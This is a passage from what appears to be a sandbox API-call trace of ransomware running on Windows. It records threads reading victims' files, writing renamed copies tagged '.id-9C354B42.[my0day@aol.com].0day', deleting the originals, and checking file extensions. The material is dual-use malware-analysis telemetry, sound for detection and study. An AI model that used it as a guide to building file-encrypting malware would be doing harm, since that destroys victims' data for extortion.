lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x2180, lpOverlapped=0x0) returned 1 [0274.779] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.779] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.779] SetEndOfFile (hFile=0x388) returned 1 [0274.780] CloseHandle (hObject=0x388) returned 1 [0274.780] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.780] SetEndOfFile (hFile=0x39c) returned 1 [0274.782] CloseHandle (hObject=0x39c) returned 1 [0274.782] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.782] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf")) returned 1 [0274.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0274.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0274.782] lstrlenW (lpString=".doc") returned 4 [0274.783] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.783] lstrlenW (lpString=".docx") returned 5 [0274.783] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.783] lstrlenW (lpString=".pdf") returned 4 [0274.783] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.783] lstrlenW (lpString=".xls") returned 4 [0274.783] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.783] lstrlenW (lpString=".xlsx") returned 5 [0274.783] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.783] lstrlenW (lpString=".ppt") returned 4 [0274.783] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0274.783] lstrlenW (lpString=".zip") returned 4 [0274.783] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.783] lstrlenW (lpString=".rar") returned 4 [0274.783] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.783] lstrlenW (lpString=".bz2") returned 4 [0274.783] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.783] lstrlenW (lpString=".7z") returned 3 [0274.783] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0274.783] lstrlenW (lpString=".dbf") returned 4 [0274.783] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0274.783] lstrlenW (lpString=".1cd") returned 4 [0274.783] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0274.783] lstrlenW (lpString=".jpg") returned 4 [0274.783] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0274.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0274.783] lstrlenW (lpString=".doc") returned 4 [0274.784] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.784] lstrlenW (lpString=".docx") returned 5 [0274.784] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.784] lstrlenW (lpString=".pdf") returned 4 [0274.784] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.784] lstrlenW (lpString=".xls") returned 4 [0274.784] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.784] lstrlenW (lpString=".xlsx") returned 5 [0274.784] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.784] lstrlenW (lpString=".ppt") returned 4 [0274.784] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0274.784] lstrlenW (lpString=".zip") returned 4 [0274.784] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.784] lstrlenW (lpString=".rar") returned 4 [0274.784] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.784] lstrlenW (lpString=".bz2") returned 4 [0274.784] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.784] lstrlenW (lpString=".7z") returned 3 [0274.784] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0274.784] lstrlenW (lpString=".dbf") returned 4 [0274.784] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0274.784] lstrlenW (lpString=".1cd") returned 4 [0274.784] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0274.784] lstrlenW (lpString=".jpg") returned 4 [0274.784] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.784] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.785] lstrlenW (lpString="DD01366_.WMF") returned 12 [0274.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 57 os_tid = 0x684 [0265.259] GetTickCount () returned 0x821a [0265.259] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x24) returned 0x503b08 [0265.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x503b08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0265.262] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x503b08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0265.264] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x503b08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x19c [0265.265] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x503b08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0265.266] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5333c8 [0265.266] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x5333c8, Size=0x20) returned 0x4fe600 [0265.266] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5333c8 [0265.266] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x5333c8, Size=0x20) returned 0x4fe628 [0265.266] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0265.266] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0265.266] Wow64DisableWow64FsRedirection (in: OldValue=0x2beff84 | out: OldValue=0x2beff84*=0x0) returned 1 [0265.266] lstrlenW (lpString="kernel32.dll") returned 12 [0265.266] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fe600 | out: hHeap=0x4a0000) returned 1 [0265.266] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0265.266] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fe628 | out: hHeap=0x4a0000) returned 1 [0265.266] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x522e80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a4 [0265.267] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0265.410] GetTickCount () returned 0x82a6 [0265.410] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0265.565] GetTickCount () returned 0x8342 [0265.565] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0265.781] GetTickCount () returned 0x841d [0265.781] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0265.947] GetTickCount () returned 0x84c8 [0265.947] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0266.165] GetTickCount () returned 0x85a3 [0266.165] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0266.407] GetTickCount () returned 0x868d [0266.407] GetTickCount () returned 0x868d [0266.407] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0266.666] GetTickCount () returned 0x87a5 [0266.666] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0266.933] GetTickCount () returned 0x8880 [0266.933] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0267.326] GetTickCount () returned 0x8a06 [0267.326] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0267.686] GetTickCount () returned 0x8b5d [0267.686] GetTickCount () returned 0x8b5d [0267.686] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0267.939] GetTickCount () returned 0x8c57 [0267.939] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0268.514] GetTickCount () returned 0x8e79 [0268.514] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0268.743] GetTickCount () returned 0x8f53 [0268.743] GetTickCount () returned 0x8f53 [0268.743] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0268.903] GetTickCount () returned 0x8fef [0268.903] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0269.057] GetTickCount () returned 0x907b [0269.058] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0269.168] GetTickCount () returned 0x90e9 [0269.168] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0269.475] GetTickCount () returned 0x9211 [0269.475] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0269.784] GetTickCount () returned 0x9339 [0269.784] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0269.980] GetTickCount () returned 0x93f5 [0269.980] GetTickCount () returned 0x93f5 [0269.980] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0270.217] GetTickCount () returned 0x94df [0270.217] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0270.375] GetTickCount () returned 0x957b [0270.375] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0270.573] GetTickCount () returned 0x9636 [0270.573] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0271.018] GetTickCount () returned 0x97fa [0271.019] GetTickCount () returned 0x97fa [0271.019] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0271.286] GetTickCount () returned 0x9903 [0271.286] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0271.518] GetTickCount () returned 0x99de [0271.518] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0271.651] GetTickCount () returned 0x9a5b [0271.651] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0271.814] GetTickCount () returned 0x9af7 [0271.814] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0271.922] GetTickCount () returned 0x9b64 [0271.922] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0272.071] GetTickCount () returned 0x9bf0 [0272.071] GetTickCount () returned 0x9bf0 [0272.071] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0272.202] GetTickCount () returned 0x9c6d [0272.202] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0272.468] GetTickCount () returned 0x9d67 [0272.468] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0272.764] GetTickCount () returned 0x9e7f [0272.764] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0272.970] GetTickCount () returned 0x9f4a [0272.970] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0273.683] GetTickCount () returned 0xa208 [0273.683] GetTickCount () returned 0xa208 [0273.683] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0273.894] GetTickCount () returned 0xa2e3 [0273.894] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0274.143] GetTickCount () returned 0xa3dc [0274.143] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0274.582] GetTickCount () returned 0xa591 [0274.582] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0274.795] GetTickCount () returned 0xa66b [0274.795] GetTickCount () returned 0xa66b [0274.795] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0275.085] GetTickCount () returned 0xa784 [0275.085] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) Thread: id = 58 os_tid = 0x688 [0265.247] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x5042e0 [0265.247] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x555e48 [0265.247] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5333e0 [0265.247] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x521af0 [0265.247] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5333f8 [0265.247] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100000) returned 0x30f0020 [0265.247] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533410 [0265.247] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533410, Size=0x20) returned 0x4fe6f0 [0265.247] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533410 [0265.247] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533410, Size=0x20) returned 0x4fe718 [0265.247] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0265.247] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0265.247] Wow64DisableWow64FsRedirection (in: OldValue=0x2d2ff58 | out: OldValue=0x2d2ff58*=0x0) returned 1 [0265.247] lstrlenW (lpString="kernel32.dll") returned 12 [0265.247] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fe6f0 | out: hHeap=0x4a0000) returned 1 [0265.247] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0265.247] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fe718 | out: hHeap=0x4a0000) returned 1 [0265.247] Sleep (dwMilliseconds=0x64) [0265.409] Sleep (dwMilliseconds=0x64) [0265.565] lstrcmpiW (lpString1=".dat", lpString2=".0day") returned 1 [0265.565] lstrlenW (lpString="bootsqm.dat") returned 11 [0265.565] CreateFileW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0265.784] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=3264) returned 1 [0265.784] CloseHandle (hObject=0x2f4) returned 1 [0265.784] GetFileAttributesW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat")) returned 0x80 [0265.784] GetFileAttributesW (lpFileName="C:\\bootsqm.dat.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\bootsqm.dat.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.784] CreateFileW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0265.784] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0265.784] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0265.784] CreateFileW (lpFileName="C:\\bootsqm.dat.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\bootsqm.dat.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0265.860] GetLastError () returned 0x0 [0265.860] ReadFile (in: hFile=0x2f4, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0xcc0, lpOverlapped=0x0) returned 1 [0265.873] WriteFile (in: hFile=0x308, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xcd0, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xcd0, lpOverlapped=0x0) returned 1 [0265.874] ReadFile (in: hFile=0x2f4, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0265.874] WriteFile (in: hFile=0x308, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xea, lpOverlapped=0x0) returned 1 [0265.874] SetEndOfFile (hFile=0x308) returned 1 [0265.874] CloseHandle (hObject=0x308) returned 1 [0265.874] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0265.874] SetEndOfFile (hFile=0x2f4) returned 1 [0265.875] CloseHandle (hObject=0x2f4) returned 1 [0265.875] SetFileAttributesW (lpFileName="C:\\bootsqm.dat.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x80) returned 1 [0265.877] DeleteFileW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat")) returned 1 [0265.877] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0265.877] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0265.877] lstrlenW (lpString=".doc") returned 4 [0265.877] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0265.877] lstrlenW (lpString=".docx") returned 5 [0265.877] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0265.877] lstrlenW (lpString=".pdf") returned 4 [0265.877] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0265.877] lstrlenW (lpString=".xls") returned 4 [0265.878] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0265.878] lstrlenW (lpString=".xlsx") returned 5 [0265.878] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0265.878] lstrlenW (lpString=".ppt") returned 4 [0265.878] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0265.878] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0265.878] lstrlenW (lpString=".zip") returned 4 [0265.878] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0265.878] lstrlenW (lpString=".rar") returned 4 [0265.878] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0265.878] lstrlenW (lpString=".bz2") returned 4 [0265.878] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0265.878] lstrlenW (lpString=".7z") returned 3 [0265.878] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0265.878] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0265.878] lstrlenW (lpString=".dbf") returned 4 [0265.878] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0265.878] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0265.878] lstrlenW (lpString=".1cd") returned 4 [0265.878] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0265.878] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0265.878] lstrlenW (lpString=".jpg") returned 4 [0265.878] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0265.878] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0265.878] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0265.878] lstrlenW (lpString=".doc") returned 4 [0265.878] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0265.878] lstrlenW (lpString=".docx") returned 5 [0265.878] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0265.878] lstrlenW (lpString=".pdf") returned 4 [0265.878] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0265.878] lstrlenW (lpString=".xls") returned 4 [0265.878] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0265.878] lstrlenW (lpString=".xlsx") returned 5 [0265.878] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0265.878] lstrlenW (lpString=".ppt") returned 4 [0265.879] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0265.879] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0265.879] lstrlenW (lpString=".zip") returned 4 [0265.879] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0265.879] lstrlenW (lpString=".rar") returned 4 [0265.879] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0265.879] lstrlenW (lpString=".bz2") returned 4 [0265.879] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0265.879] lstrlenW (lpString=".7z") returned 3 [0265.879] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0265.879] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0265.879] lstrlenW (lpString=".dbf") returned 4 [0265.879] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0265.879] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0265.879] lstrlenW (lpString=".1cd") returned 4 [0265.879] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0265.879] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0265.879] lstrlenW (lpString=".jpg") returned 4 [0265.879] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0265.879] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0265.879] lstrlenW (lpString="boxed-split.avi") returned 15 [0265.879] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0266.472] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=62976) returned 1 [0266.472] CloseHandle (hObject=0x308) returned 1 [0266.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0266.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.472] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0266.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0266.472] lstrlenW (lpString=".doc") returned 4 [0266.473] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.473] lstrlenW (lpString=".docx") returned 5 [0266.473] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0266.473] lstrlenW (lpString=".pdf") returned 4 [0266.473] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.473] lstrlenW (lpString=".xls") returned 4 [0266.473] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.473] lstrlenW (lpString=".xlsx") returned 5 [0266.473] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0266.473] lstrlenW (lpString=".ppt") returned 4 [0266.473] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0266.473] lstrlenW (lpString=".zip") returned 4 [0266.473] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.473] lstrlenW (lpString=".rar") returned 4 [0266.473] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.473] lstrlenW (lpString=".bz2") returned 4 [0266.473] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.473] lstrlenW (lpString=".7z") returned 3 [0266.473] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0266.473] lstrlenW (lpString=".dbf") returned 4 [0266.473] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0266.473] lstrlenW (lpString=".1cd") returned 4 [0266.473] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0266.473] lstrlenW (lpString=".jpg") returned 4 [0266.473] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 